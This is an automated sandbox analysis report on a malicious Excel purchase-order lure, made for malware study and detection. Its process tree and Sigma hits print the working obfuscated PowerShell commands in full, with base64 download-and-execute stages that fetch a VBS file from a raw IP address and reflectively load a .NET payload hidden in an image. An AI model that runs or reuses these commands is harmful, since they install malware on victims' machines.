Windows Analysis Report
Orden_de_Compra_Nmero_6782929219.xls

Overview

General Information

Sample name:Orden_de_Compra_Nmero_6782929219.xls
Analysis ID:1572123
MD5:02312414e969b79f88ffde0b68090227
SHA1:aab17d76b523a0a1c79391468885ab855a6f2196
SHA256:8ca816015c1a43fa8cfe732759ba029e176f94e372176ccb8940d91cfc6a7984
Tags:xls, user-abuse_ch

Detection

HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Connects to a pastebin service (likely for C&C)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3312 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3592 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3692 cmdline: "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'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'+[CHaR]0X22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3716 cmdline: poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'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'+[CHaR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3920 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3932 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES476D.tmp" "c:\Users\user\AppData\Local\Temp\izhw321o\CSCDC8260CFBF8C4877B302B76AFCC254F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 4044 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 4092 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals MD5: A575A7610E5F003CC36DF39E07C4BA7D)
    • AcroRd32.exe (PID: 3764 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)
      • RdrCEF.exe (PID: 1404 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 326A645391A97C760B60C558A35BB068)
    • mshta.exe (PID: 1972 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3684 cmdline: "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'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'+[CHaR]0X22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3932 cmdline: poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 1844 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 2064 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA5F0.tmp" "c:\Users\user\AppData\Local\Temp\24vqjdjh\CSCC170874EB5994B058785371DF20B8BA.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 4068 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3832 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = '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';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive[1].hta | JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security
    Source | Rule | Description | Author | Strings
    Process Memory Space: powershell.exe PID: 4092 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
      Process Memory Space: powershell.exe PID: 4092 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
      • 0x4aa7f:$b2: ::FromBase64String(
      • 0x55e1c:$b2: ::FromBase64String(
      • 0x728d2:$b2: ::FromBase64String(
      • 0x72f2c:$b2: ::FromBase64String(
      • 0x7485c:$b2: ::FromBase64String(
      • 0x75014:$b2: ::FromBase64String(
      • 0x75d01:$b2: ::FromBase64String(
      • 0x7e6f9:$b2: ::FromBase64String(
      • 0x8f7aa:$b2: ::FromBase64String(
      • 0x8f813:$b2: ::FromBase64String(
      • 0x91274:$b2: ::FromBase64String(
      • 0x4aa5e:$b3: ::UTF8.GetString(
      • 0x55c3c:$b3: ::UTF8.GetString(
      • 0x728b1:$b3: ::UTF8.GetString(
      • 0x72f0b:$b3: ::UTF8.GetString(
      • 0x7483b:$b3: ::UTF8.GetString(
      • 0x74ff3:$b3: ::UTF8.GetString(
      • 0x75ce0:$b3: ::UTF8.GetString(
      • 0x7e6d8:$b3: ::UTF8.GetString(
      • 0x8f7f2:$b3: ::UTF8.GetString(
      • 0x91253:$b3: ::UTF8.GetString(
      Process Memory Space: powershell.exe PID: 3832 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
        Process Memory Space: powershell.exe PID: 3832 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
        • 0xf5a3:$b2: ::FromBase64String(
        • 0xfd5e:$b2: ::FromBase64String(
        • 0x2ca53:$b2: ::FromBase64String(
        • 0x34585:$b2: ::FromBase64String(
        • 0x460f6:$b2: ::FromBase64String(
        • 0x4615f:$b2: ::FromBase64String(
        • 0x47c42:$b2: ::FromBase64String(
        • 0x568ca:$b2: ::FromBase64String(
        • 0x6fa8c:$b2: ::FromBase64String(
        • 0x700e6:$b2: ::FromBase64String(
        • 0xf582:$b3: ::UTF8.GetString(
        • 0xfd3d:$b3: ::UTF8.GetString(
        • 0x2ca32:$b3: ::UTF8.GetString(
        • 0x34564:$b3: ::UTF8.GetString(
        • 0x4613e:$b3: ::UTF8.GetString(
        • 0x47c21:$b3: ::UTF8.GetString(
        • 0x566ea:$b3: ::UTF8.GetString(
        • 0x6fa6b:$b3: ::UTF8.GetString(
        • 0x700c5:$b3: ::UTF8.GetString(
        • 0x14460:$s1: -join
        • 0x2446e:$s1: -join

        System Summary

        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = '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';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9y
        Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3312, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive[1].hta
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'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'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3716, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" , ProcessId: 4044, ProcessName: wscript.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = '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';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = '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
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; 
inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICA
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3312, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3592, ProcessName: mshta.exe
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpd
